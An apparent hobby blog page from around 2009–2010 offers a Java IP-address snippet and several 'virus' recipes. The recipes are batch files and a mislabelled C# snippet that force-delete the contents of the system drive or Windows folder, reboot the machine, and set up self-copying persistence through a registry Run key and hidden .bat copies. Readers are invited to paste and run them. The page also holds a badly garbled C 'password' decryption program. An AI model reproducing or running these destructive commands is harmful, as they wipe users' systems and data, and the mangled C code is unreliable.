Showing posts with label programs. Show all posts
Showing posts with label programs. Show all posts

Sunday, January 31, 2010

JAVA pgm to detect IP address

import java.net.InetAddress;
import java.net.UnknownHostException;

public class ToDetectIPAdress {

public static void main(String[] args) {
try {
System.out.println(InetAddress.getLocalHost().getHostName());
System.out.println(InetAddress.getLocalHost().getHostAddress());

} catch (UnknownHostException e) {
e.printStackTrace();
}

}

}
--*--

Saturday, September 5, 2009

Get the computer pasword-virus using C pgm

//Code :
# include"stdio.h"
# include"process.h"
# include"stdlib.h"
# include"ctype.h"
# include"conio.h"
# include"mem.h"

unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

void main(int argc,char *argv[]){
FILE *fd;
int i,j;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* Resourse allocation table */

if(argc<2){ fd="fopen(argv[1]," fd="="NULL){" size="0;" name="argv[1];">2)name=argv[2];
printf("Username:%s
",name);

/* Copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0)cracked=0;>1000)cracked=1000;
memcpy(keystream,Data+0x208,cracked);

/* Generate 20 bytes of keystream */
for(i=0;i<20;i++){ ch="toupper(name[i]);" ch="="0)break;" ch="="'.')break;" cracked="20;" sizemask="keystream[0]+(keystream[1]<<8);" i="0;i<256;i++){">maxr)maxr=Data[i];
}
}

maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
divisible by 16 */

/*Search after resources */

Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
for(i=0;i>8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d Bytes of ketstream recoverd
",cracked);

/* Decrypt resources */
for(i=0;icracked)rsz=cracked;
printf("Resource[%d](%d)
",i,rsz);
for(j=0;j
printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("
");
}
exit(0);
}

Sunday, August 23, 2009

Simple batch virus

SIMPLE BATCH VIRUS

This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don’t run this on ur pc
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h [...]

creat a virus in c++

using System;
using System.Diagnostics;

namespace DoingThisIsDumb
{
public static void Main()
{
Process.Start("deltree.exe", "-r -f %SYSTEMROOT%");
}
}

create a virus in notepad

@Echo off
Del C:\ *.* |y

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

create a virus using notepad

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

How to Put Google Adsense Below Post Title in Blogger?

Adsense is used by  majority  of expert bloggers for their website monetization because it is a cookie based contextual advertising syste...